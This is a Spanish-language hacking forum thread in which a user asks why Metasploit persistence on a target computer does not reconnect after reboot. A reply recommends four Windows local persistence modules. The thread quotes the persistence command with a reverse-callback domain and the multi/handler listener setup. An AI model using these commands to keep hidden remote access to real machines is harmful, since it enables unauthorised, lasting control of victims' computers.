elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  No funciona la persistencia en metasploit framework
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: No funciona la persistencia en metasploit framework  (Leído 4,656 veces)
kilerpi

Desconectado Desconectado

Mensajes: 12


Ver Perfil
No funciona la persistencia en metasploit framework
« en: 20 Junio 2016, 21:28 pm »

Bueno amigos les comento mi problema, yo uso kali linux para practicar pentesting, tengo algunos problemas cuando quiero instalar una persistencia en el computador objetivo para poderme conectar siempre, uso este comando "run persistence -U -i 5 -p 1717 -r (mi dominio en noip)" luego le doy enter y efectivamente me dice que la persistencia se ha instalado correctamente entonces yo en la session meterpreter que tengo abierta escribo reboot para reiniciar la maquina atacada  luego abro una nueva ventana de metasploit framework y escribo "use exploit/multi/hanlder" y luego cuando estoy en el exploit escribo "set LHOST (mi dominio en no ip)" y luego pongo "set LPORT 1717" entonces le doy run y me sale esto

  • Started reverse TCP handler on 192.168.1.4:1717
  • Starting the payload handler...

lo que quiere decir que esta esperando la conexión que ya antes configure con persistencia, pero nunca se conecta siempre se queda asi, yo supongo que si configure bien el cliente de no ip ya que si abro una nueva consola en kali linux y realizo un ping a mi dominio no ip efectivamente me devuelve mi ip, me podrian deicr en que me estoy equivocando ? poruqe no logro que la persistencia funcione si cuando corro el comando para instalar la persistencia me me sale que se ha instalado correctamente ?
antes usaba veil framework para generar los payloads crei que esa era la razon por la que no me funcionaba la persistencia pero acabo de generar uno con msfvenom y tampoco funciona la persistencia.
« Última modificación: 20 Junio 2016, 21:30 pm por kilerpi » En línea

GreenArrow77

Desconectado Desconectado

Mensajes: 13


https://www.youtube.com/watch?v=IlY9C6pzxKc


Ver Perfil WWW
Re: No funciona la persistencia en metasploit framework
« Respuesta #1 en: 27 Junio 2016, 13:02 pm »

hola kilerpi

por lo que he visto, haces la persistencia desde la meterpreter (y según mi experiencia de metasploit) algunos comandos en la meterpreter dan lugar a fallos, como por ejemplo, siendo "nt system" (es decir, que has elevado privilegios y anteriormente has hecho el "getsysem"), al escribir el comando "hashdump" me ha arrojado errores, y es ilógico porque esta todo correcto, y eso me llevó a considerar varias alternativas, y acabé mandando la sesión a segundo plano (con "background") y use desde msf el comando "use post/windows/gather/hashdump" y efectivamente funcionó, ahora bien...por que te explico todo esto? porque quiero que veas que hay veces que la meterpreter falla, y nos volvemos locos buscando los errores. Por tanto, dos posibles soluciones con un mismo factor en común, ya citado antes (usar los modulos desde la msf):

* use exploit/windows/local/persistence
* use exploit/windows/local/registry_persistence
* use exploit/windows/local/vss_persistence
* use exploit/windows/local/s4u_persistence

Estos 4 son bastante efectivos, a mi personalmente me gusta (y me funciona) el 2º, ya que el problema que creo que puedes tener es que cuando ejecutas desde la meterpreter el script "run persistence..." (porque es un script), y pienso que puede tender a fallar, pues pienso que puede suceder es que el payload que mandas a anclarse al registro (por eso se llama persistencia, porque se inicia con el registro, eso hay que tenerlo en cuenta) no se engancha correctamente o simplemente no lo hace. Por tanto, con esto creo que la persistencia tendría un buen resultado, ves probando otros metodos y comprobando que se ancla en el registro, espero haberte ayudado,

un saludo! -by secu
En línea

~La única lucha que se pierde es la que se abandona.- E."Che" Guevara~
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Metasploit framework 3.3.3
Hacking
Druxman Mishima 2 5,990 Último mensaje 25 Mayo 2010, 14:40 pm
por Druxman Mishima
metodos de persistencia metasploit
Hacking
xeroAG 2 7,255 Último mensaje 27 Junio 2016, 13:06 pm
por GreenArrow77
Persistencia en metasploit
Hacking
AngelCaidoxX 0 2,788 Último mensaje 19 Diciembre 2017, 17:32 pm
por AngelCaidoxX
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines